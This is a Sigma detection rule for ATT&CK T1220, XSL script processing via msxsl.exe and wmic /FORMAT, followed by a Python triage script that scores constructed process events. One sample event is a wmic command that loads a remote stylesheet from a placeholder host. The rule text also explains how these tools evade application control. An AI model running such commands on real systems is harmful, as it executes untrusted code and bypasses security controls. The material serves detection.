title: XSL Script Processing (T1220)
id: df00tech-t1220
status: experimental
description: "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa."
references:
  - https://attack.mitre.org/techniques/T1220/
  - https://df00tech.com/detections/T1220
author: df00tech
date: 2026/04/13
tags:
  - attack.t1220
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # The df00tech KQL/SPL query could not be auto-translated; the selections below are
  # derived from the two vectors named in the description (msxsl.exe and wmic /FORMAT).
  # Consult the full query on df00tech for environment-specific tuning.
  selection_msxsl:
    Image|endswith: '\msxsl.exe'
  selection_wmic:
    Image|endswith: '\wmic.exe'
    CommandLine|contains: '/format'
  condition: 1 of selection_*
falsepositives:
  - Legitimate XSLT transformations performed by developers or build pipelines using msxsl.exe — rare since the tool is not installed by default
  - "WMIC reporting scripts that use /FORMAT with built-in XSL stylesheets from %SystemRoot%\\System32\\wbem\\en-US\\ (e.g., wmic process list /FORMAT:list.xsl)"
  - XML/XSLT tooling in CI/CD pipelines or data processing workflows that invoke msxsl.exe for document transformation
  - System administration scripts that legitimately use wmic /FORMAT for structured output — verify the XSL path resolves to a known-good system location
level: high
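As an added triage example (not part of the df00tech rule), the script below applies the two vectors from the description to constructed Sysmon-style process-creation records and implements the false-positive check from above: a wmic /FORMAT stylesheet that resolves to the built-in wbem\en-US directory is marked for review rather than high. The event records, the BUILTIN_XSL_DIR value and the "bare name resolves to the built-in directory" assumption are mine, not the page's.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# Constructed Sysmon-style process-creation records (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process list /FORMAT:list.xsl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /FORMAT:"https://example.invalid/x.xsl"'},
    {"Image": r"C:\Users\Public\msxsl.exe",
     "CommandLine": r"msxsl.exe data.xml script.xsl"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe report.xsl"},
]

# Known-good location of the built-in WMIC stylesheets (assumed default install path).
BUILTIN_XSL_DIR = r"c:\windows\system32\wbem\en-us"

# Captures the stylesheet argument of /FORMAT:, with or without surrounding quotes.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def xsl_is_builtin(arg: str) -> bool:
    """True if the /FORMAT stylesheet resolves to the built-in wbem\\en-US directory.

    Assumption: a bare name such as list.xsl is taken to resolve against that
    directory; URLs and explicit paths elsewhere are treated as untrusted.
    """
    if re.match(r"^[a-z]+://", arg, re.IGNORECASE):
        return False                      # remote stylesheet, never built-in
    parent = PureWindowsPath(arg).parent
    if parent == PureWindowsPath("."):
        return True                       # bare stylesheet name
    normalized = str(parent).lower().replace("%systemroot%", r"c:\windows")
    return normalized == BUILTIN_XSL_DIR


def evaluate(event: dict) -> Optional[str]:
    """Return 'high', 'review', or None for one process-creation event."""
    image = event["Image"].lower()
    if image.endswith(r"\msxsl.exe"):
        return "high"                     # msxsl.exe is not a default Windows binary
    if image.endswith(r"\wmic.exe"):
        match = FORMAT_RE.search(event["CommandLine"])
        if match is None:
            return None                   # wmic without /FORMAT is out of scope
        return "review" if xsl_is_builtin(match.group(1)) else "high"
    return None


if __name__ == "__main__":
    for event in EVENTS:
        print(evaluate(event), event["CommandLine"])
```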
